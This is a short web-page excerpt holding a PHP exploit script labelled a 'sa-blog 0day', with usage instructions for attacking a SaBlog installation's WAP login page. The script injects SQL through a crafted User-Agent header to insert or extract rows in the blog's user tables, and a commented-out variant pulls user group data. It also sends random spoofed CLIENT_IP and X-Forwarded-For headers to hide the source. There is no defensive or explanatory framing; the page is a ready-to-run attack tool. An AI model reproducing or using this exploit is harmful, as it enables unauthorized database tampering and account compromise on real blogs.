以下是引用片段:
<?php
//from loveshell.net
$url = $argv[1].'/wap/index.php';
$username = $argv[2];
$password = $argv[3];
echo" +----------------------------------------------------------------+\r\n";
echo" Uage: php.exe blogurl username password\r\n";
echo" example php.exe http://www.loveshell.net/blog test test\r\n";
echo" +----------------------------------------------------------------+\r\n";
if(!$username||!$password) die;
echo" root@localhost:Post our content\r\n";
$str = 'username='.$username.'&password='.$password.'&action=login&do=login&';
$msg = myrequest($str,$url);
echo $msg;
if(strpos($msg,'登陆成功')!==false) echo" root@localhost:All Done!!! \r\n";
else echo" root@localhost:Login error!!! \r\n";
echo" +----------------------------------------------------------------+\r\n";
echo" Enjoy yourself.\r\n";
echo" +----------------------------------------------------------------+\r\n";
function myrequest($msg,$url,$type=2,$cookie=''){
//change type for post/get
global $sql;
$urls = initurl($url);
$iprand = rand(1,255).'.'.rand(1,255).'.'.rand(1,255).'.'.rand(1,255);
$fp = @fsockopen($urls['host'], $urls['port'], $errno, $errstr, 3);
if($fp) {
if($type==1){
fputs($fp, "GET $urls[path]?$urls[query] HTTP/1.1\r\n");
fputs($fp, "Host: $urls[host]\r\n");
fputs($fp, "Accept: */*\r\n");
fputs($fp, "Referer: $urls[url]\r\n");
fputs($fp, "User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)\r\n");
fputs($fp, "CLIENT_IP: $iprand\r\n");
fputs($fp, "X_FORWARDED-FOR: $iprand\r\n");
fputs($fp, "Pragma: no-cache\r\n");
fputs($fp, "Cache-Control: no-cache\r\n");
fputs($fp, "Connection: Keep-Alive\r\n");
fputs($fp, "Cookie: $cookie\r\n\r\n");
}else{
fputs($fp, "POST $urls[path]?$urls[query] HTTP/1.1\r\n");
fputs($fp, "Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n");
fputs($fp, "Referer: $urls[url]\r\n");
fputs($fp, "Accept-Language: zh-cn\r\n");
fputs($fp, "Content-Type: application/x-www-form-urlencoded\r\n");
// fputs($fp, "User-Agent: ',1),((select concat(0x2f,groupid,0x2f,logincount) from angel_users limit 1),1,1,'211.43.206.208','123\r\n");
fputs($fp, "User-Agent: ',1),('9c5b71e5',1,1,'211.43.206.202','9989581653\r\n");
fputs($fp, "CLIENT_IP: $iprand\r\n");
fputs($fp, "X_FORWARDED-FOR: $iprand\r\n");
fputs($fp, "Host: $urls[host]\r\n");
fputs($fp, "Content-Length: ".strlen($msg)."\r\n");
fputs($fp, "Connection: Keep-Alive\r\n");
fputs($fp, "Cache-Control: no-cache\r\n");
fputs($fp, "Cookie: $cookie\r\n\r\n");
fputs($fp, $msg."\r\n");
}
}
while($fp&&!feof($fp)) {
$resp .= fread($fp,1024);
}
return $resp;
}
function initurl($url) {
$newurl = '';
$blanks = array('url'=>'');
$urls = $blanks;
if(strlen($url)<10) return $blanks;
$urls = @parse_url($url);
if(empty($urls) || !is_array($urls)) return $blanks;
if(empty($urls['scheme'])) return $blanks;
if($urls['scheme'] == 'file') return $blanks;
$newurl .= $urls['scheme'].'://';
$newurl .= empty($urls['user'])?'':$urls['user'];
$newurl .= empty($urls['pass'])?'':':'.$urls['pass'];
$newurl .= empty($urls['host'])?'':((!empty($urls['user']) || !empty($urls['pass']))?'@':'').$urls['host'];
$newurl .= empty($urls['port'])?'':':'.$urls['port'];
$newurl .= empty($urls['path'])?'':$urls['path'];
$newurl .= empty($urls['query'])?'':'?'.$urls['query'];
$newurl .= empty($urls['fragment'])?'':'#'.$urls['fragment'];
$urls['port'] = empty($urls['port'])?'80':$urls['port'];
$urls['url'] = $newurl;
return $urls;
}
?> | |
[推荐]sa-blog 0day
您现在的位置: